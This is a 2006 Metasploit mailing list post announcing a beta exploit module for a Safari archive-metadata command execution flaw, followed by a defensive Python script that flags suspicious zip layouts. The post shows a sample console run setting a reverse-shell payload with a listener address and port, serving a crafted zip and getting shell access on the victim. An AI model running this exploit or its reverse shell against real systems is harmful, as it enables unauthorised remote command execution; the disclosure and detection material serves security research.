Metasploit mailing list archives

Safari Archive Metadata Command Execution


From: hdm at metasploit.com (H D Moore)
Date: Wed, 22 Feb 2006 01:12:36 -0600

Hello,

Attached is a beta module for the Safari vulnerability announced today. 
The module depends on the 'zip' utility being in your path (MSFCygwin 
users should already have this installed). To use, load the module, 
select a payload, and then browse to the web service with a vulnerable 
version of Safari. It should automatically open the zip file and execute 
the shell script containing the payload.  Please mail me offlist if you 
encounter problems with this module. Thanks!

-HD

-- sample run --


msf > use safari_safefiles_exec
msf safari_safefiles_exec(cmd_re) > set PAYLOAD cmd_unix_reverse
PAYLOAD -> cmd_unix_reverse
msf safari_safefiles_exec(cmd_unix_reverse) > set LHOST 192.168.0.100
LHOST -> 192.168.0.100
msf safari_safefiles_exec(cmd_unix_reverse) > set LPORT 4321
LPORT -> 4321
msf safari_safefiles_exec(cmd_unix_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.100:8080/
  adding: LR6E45uoWshn3.mov (deflated 24%)
  adding: __MACOSX/._LR6E45uoWshn3.mov (deflated 87%)
[*] HTTP Client connected from ME:49381, sending 98 bytes of payload...
[*] Recieved first connection.
[*] Recieved second connection.
[*] Got connection from 192.168.0.100:4321 <-> 192.168.0.167:49393 
192.168.0.100:4321 <-> 192.168.0.167:49392

id
uid=501(hdm) gid=501(hdm) groups=501(hdm), 79(appserverusr), 80(admin), 81
(appserveradm)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: safari_safefiles_exec.pm
Type: application/x-perl-module
Size: 13072 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060222/3d38b45a/attachment.bin>
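A defender-side check for the archive layout visible in the sample run above (a media-named member plus a `__MACOSX/._` sidecar), as an added example that is not part of the original post or of the attached module. The extension list, the text heuristic and all function names are assumptions made here. The sample archives are constructed, with a stub sidecar that carries only the AppleDouble magic number.

```python
import io
import zipfile

APPLEDOUBLE_MAGIC = b"\x00\x05\x16\x07"  # AppleDouble header magic number
# Assumption: extensions a browser might treat as "safe" to auto-open.
MEDIA_EXTS = (".mov", ".mp4", ".mp3", ".jpg", ".png", ".pdf")

def head(zf, name, n=512):
    """Read only the first n bytes of a member (avoids inflating huge files)."""
    with zf.open(name) as fh:
        return fh.read(n)

def looks_like_text(data):
    """Heuristic: no NUL bytes and almost entirely printable ASCII."""
    if not data or b"\x00" in data:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    return printable / len(data) > 0.95

def suspicious_members(zip_bytes):
    """Media-named members that are plain text and have a __MACOSX sidecar."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = set(zf.namelist())
        for name in names:
            if name.startswith("__MACOSX/") or not name.lower().endswith(MEDIA_EXTS):
                continue
            folder, _, base = name.rpartition("/")
            sidecar = "__MACOSX/" + (folder + "/" if folder else "") + "._" + base
            if (sidecar in names
                    and head(zf, sidecar, 4) == APPLEDOUBLE_MAGIC
                    and looks_like_text(head(zf, name))):
                hits.append(name)
    return sorted(hits)

def build_sample(member, body, with_sidecar):
    """Constructed test archive; the sidecar is a magic-number stub only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, body)
        if with_sidecar:
            zf.writestr("__MACOSX/._" + member, APPLEDOUBLE_MAGIC + b"\x00" * 22)
    return buf.getvalue()

if __name__ == "__main__":
    sample = build_sample("clip.mov", b"echo constructed sample\n", True)
    print(suspicious_members(sample))
```

A hit means the member's name claims a media type while its content is plain text and separate Finder metadata accompanies it; treat it as a lead for manual review, not a verdict.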

